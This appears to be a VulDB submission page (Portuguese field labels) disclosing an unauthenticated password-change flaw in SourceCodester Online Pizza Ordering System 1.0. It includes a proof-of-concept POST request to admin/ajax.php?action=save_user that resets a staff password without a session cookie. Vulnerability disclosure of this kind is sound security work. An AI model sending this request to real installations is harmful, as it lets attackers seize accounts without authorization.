| Título | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 Unauthorized Password Modification |
|---|
| Descrição | SOURCECODESTER ONLINE PIZZA ORDERING SYSTEM 1.0 has an Unauthorized Password Modification vulnerability, the vulnerability is due to access control weakness. Remote and unauthenticated attacker can change the password directly without login.
There is a poc below :
POST /php-opos/admin/ajax.php?action=save_user HTTP/1.1
*********************************(without cookie in header)
id=2&name=Staff&username=staff&password=abcdefg&type=2
Then the password will be changed to 'abcdefg' without authentication. |
|---|
| Fonte | ⚠️ https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html |
|---|
| Utilizador | WWesleywww (UID 43117) |
|---|
| Submissão | 17/03/2023 08h33 (há 3 anos) |
|---|
| Moderação | 17/03/2023 08h51 (17 minutes later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 223305 [SourceCodester Online Pizza Ordering System 1.0 Password Change ajax.php?action=save_user Autenticação fraca] |
|---|
| Pontos | 20 |
|---|